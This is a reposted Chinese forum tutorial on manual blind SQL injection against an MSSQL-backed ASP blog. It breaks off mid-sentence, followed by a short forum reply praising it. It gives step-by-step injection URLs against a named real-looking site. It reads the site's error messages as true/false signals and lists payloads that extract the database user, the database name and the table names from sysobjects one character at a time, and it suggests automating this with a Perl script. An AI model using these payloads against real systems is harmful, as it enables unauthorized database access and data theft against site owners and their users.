[转帖]如何灵活地运用SQL Injection做数据库渗透的一种思路
<P>作者:cawan 文章来源:邪恶八进制安全小组 </P><P>如何灵活地运用SQL Injection做数据库渗透的一种思路</P>
<P>如今,很多关于mssql数据库的渗透技巧已不能有效地获取有用的数据值。比如在一个怀疑是注入点的地方 </P>
<P><a href="http://www.xxxxx.com/blog.asp?id=4" target="_blank" >www.xxxxx.com/blog.asp?id=4</A></P>
<P>当加入" ' "符号进行注入测试时,</P>
<P><a href="http://www.xxxxx.com/blog.asp?id=4'" target="_blank" >www.xxxxx.com/blog.asp?id=4'</A></P>
<P>出错信息是,</P>
<P>Syntax error converting the varchar value '4? to a column of data type int</P>
<P>我们知道它不对" ' "符号进行过滤。再用如下语句测试,</P>
<P><a href="http://www.aquavelvas.com/blog.asp?id=4" target="_blank" >http://www.aquavelvas.com/blog.asp?id=4</A> and 1=1</P>
<P>出错信息是,</P>
<P>Syntax error converting the varchar value '4 and 1=1' to a column of data type int</P>
<P>好,再来继续测试,</P>
<P><a href="http://www.aquavelvas.com/blog.asp?id=4'%20and%20'1'='1" target="_blank" >http://www.aquavelvas.com/blog.asp?id=4'%20and%20'1'='1</A></P>
<P>这次出错讯息不同了,如下</P>
<P>Line 1: Incorrect syntax near ' and '</P>
<P>我们的" ' "符号加对了,再继续测试,</P>
<P><a href="http://www.aquavelvas.com/blog.asp?id=4'%20and%20user target="_blank" >'0">http://www.aquavelvas.com/blog.asp?id=4'%20and%20user>'0</A></P>
<P>出错信息如下,</P>
<P>Line 1: Incorrect syntax near ' and user>'</P>
<P>应该是语法不允许直接回值,是不是不能再继续了呢?想想其他办法,就看user值的长度吧,</P>
<P><a href="http://www.aquavelvas.com/blog.asp?id=4'%20and%20len(user) target="_blank" >'0">http://www.aquavelvas.com/blog.asp?id=4'%20and%20len(user)>'0</A></P>
<P>出错信息是,</P>
<P>Line 1: Incorrect syntax near ' and len(user)>'</P>
<P>好,我们知道如果出错信息是Syntax error...或Either BOF or EOF is True...的话,那语句在逻辑上是错的;而如果出错信息是Incorrect syntax...的话,那语句在逻辑上就是对的。当处理len(user)>0,凭着刚才的想法,我们知道在逻辑上这是对的。</P>
<P>我们试试逻辑上错的语句,</P>
<P><a href="http://www.aquavelvas.com/blog.asp?id=4'%20and%20user%20'1'='2" target="_blank" >http://www.aquavelvas.com/blog.asp?id=4'%20and%20user%20'1'='2</A></P>
<P>果然,出错信息是,</P>
<P>Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record</P>
<P>从len(user)>0这语法的基础上,我们得知user的长度是7,之后再用left(user,1)=a这语法来猜出user名是<BR>thomasa。再用db_name()这个function,我们可猜出数据库名。</P>
<P>好了,如何猜表名呢?就先猜表名的长度吧,</P>
<P>就用如下语句,</P>
<P>len(select top 1 name from sysobjects where xtype='U')>10<BR>len(select top 1 name from sysobjects where xtype='U')>9<BR>len(select top 1 name from sysobjects where xtype='U')>8<BR>...</P>
<P>(猜表名的工作是很烦人,建议用perl写个script来玩玩)</P>
<P>再猜表名,</P>
<P>left((select top 1 name from sysobjects where xtype='U'),1)=a<BR>left((select top 1 name from sysobjects where xtype='U'),2)=ab<BR>left((select top 1 name from sysobjects where xtype='U'),3)=abc<BR>...</P>
<P>好了,我们知道第一个表名是'geoipcountrywhois' (知道为什么我建议写个perl script吧!)</P>
<P>再继续猜表名,</P>
<P>len(select top 1 name from sysobjects where xtype='U' and name not in ('geoipcountrywhois')>10<BR>len(select top 1 name from sysobjects where xtype='U' and name not in ('geoipcountrywhois')>9<BR>len(select top 1 name from sysobjects where xtype='U' and name not in ('geoipcountrywhois')>8<BR>...</P>
<P>left((select top 1 name from sysobjects where xtype='U' and name not in ('geoipcountrywhois')),1)=b<BR>left((select top 1 name from sysobjects where xtype='U' and name not in ('geoipcountrywhois')),1)=l<BR>left((select top 1 name from sysobjects where xtype='U' and name not in ('geoipcountrywhois')),1)=o<BR>....</P>
<P>好第二个表名是blog,之后的表名可用('geoipcountrywhois','blog')来继 好文章`````怎么没有人顶````````以后要多发这类东西```
页:
[1]